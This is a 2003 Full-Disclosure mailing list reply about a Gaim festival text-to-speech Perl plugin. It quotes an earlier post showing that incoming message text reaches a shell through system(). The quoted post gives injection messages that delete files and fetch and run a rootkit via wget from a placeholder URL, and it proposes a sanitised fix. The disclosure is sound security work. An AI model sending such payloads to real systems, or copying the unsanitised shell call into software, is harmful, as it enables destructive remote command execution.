[Full-Disclosure] Re: Gaim festival plugin exploit

From: HCTITS Security Division (security_at_humancentrictech.com)
Date: 10/18/03

  • Next message: HCTITS Security Division: "[Full-Disclosure] Re: Gaim festival plugin exploit" 
    Date: 17 Oct 2003 21:05:07 -0400

    DUH... would help if I attached my attachment.

    I am right proud of myself for this, and it also needs mention to
    address the security issue that our friend Error (is that a reference to
    Zelda 2?) raised.

    Attached, find the latest reissue of the Gaim festival plugin. The guy
    that wrote it, wrote it for pre-0.68 Perl API, but it was secure against
    the sort of attack that Error described. I have since taken it and
    recoded it to work with post-0.68 versions of Gaim. It is attached. By
    all means, if you see an exploitable bug in there, let me know! I'm
    just a perl-tot..

    Cheers,
    ~Brian

    On Wed, 2003-10-15 at 11:29, error wrote:
    > It has come to my attention that people have actually used this example
    > code for a gaim plugin:
    >
    > AIM::register("Festival TTS", "0.0.1", "goodbye", "");
    > AIM::print("Perl Says", "Loaded Festival TTS");
    > AIM::command("idle", "60000") if ($pro ne "Offline");
    > AIM::add_event_handler("event_im_recv", "synthesize");
    >
    > sub goodbye {
    > AIM::print("Module Unloaded", "Unloaded Festival TTS");
    > }
    >
    > sub synthesize {
    > my $string = $_[0];
    > $string =~ s/\<.*?\>//g;
    > $string =~ s/\".*\"//;
    > system("echo \"$string\" | /usr/bin/festival --tts");
    > }
    >
    > As taken from:
    > http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl
    >
    > This has to be one of the most amusing ways to gain a local users
    > privileges I have ever seen by an "Expert (TM)"
    >
    > Exploit code?
    > You have a shell through gaim with that.
    >
    > Just pass it this message (or really any message for that matter):
    >
    > Hey, I just wanted to exploit your box, do you mind?"; rm -rf;
    >
    > Or perhaps:
    >
    > Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
    > rootkit;./rootkit
    >
    > Perhaps someone should ask:
    >
    > "(Is s/[^\w]//g really that hard to do?!)"
    >
    > So a fixed version would look like this:
    >
    > AIM::register("Festival TTS", "0.0.1", "goodbye", "");
    > AIM::print("Perl Says", "Loaded Festival TTS");
    > AIM::command("idle", "60000") if ($pro ne "Offline");
    > AIM::add_event_handler("event_im_recv", "synthesize");
    >
    > sub goodbye {
    > AIM::print("Module Unloaded", "Unloaded Festival TTS");
    > }
    >
    > sub synthesize {
    > my $string = $_[0];
    > $string =~ s/\<.*?\>//g;
    > $string =~ s/\".*\"//;
    > $string =~ s/[^\w]//g;
    > system("echo \"$string\" | /usr/bin/festival --tts");
    > }
    >
    > Just a minor comment, nothing special. 

    -- 
HCTITS Security Division <security@humancentrictech.com>
HumanCentric Technologies

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: HCTITS Security Division: "[Full-Disclosure] Re: Gaim festival plugin exploit"

    Relevant Pages

    • [Full-Disclosure] Re: Gaim festival plugin exploit
      ... address the security issue that our friend Error (is that a reference to ... find the latest reissue of the Gaim festival plugin. ... > sub synthesize { ...
      (Full-Disclosure)
    • Re: Gaim festival plugin exploit
      ... address the security issue that our friend Error (is that a reference to ... find the latest reissue of the Gaim festival plugin. ... > sub synthesize { ...
      (Bugtraq)
    • Re: Gaim festival plugin exploit
      ... address the security issue that our friend Error (is that a reference to ... find the latest reissue of the Gaim festival plugin. ... > sub synthesize { ...
      (Full-Disclosure)
    Loading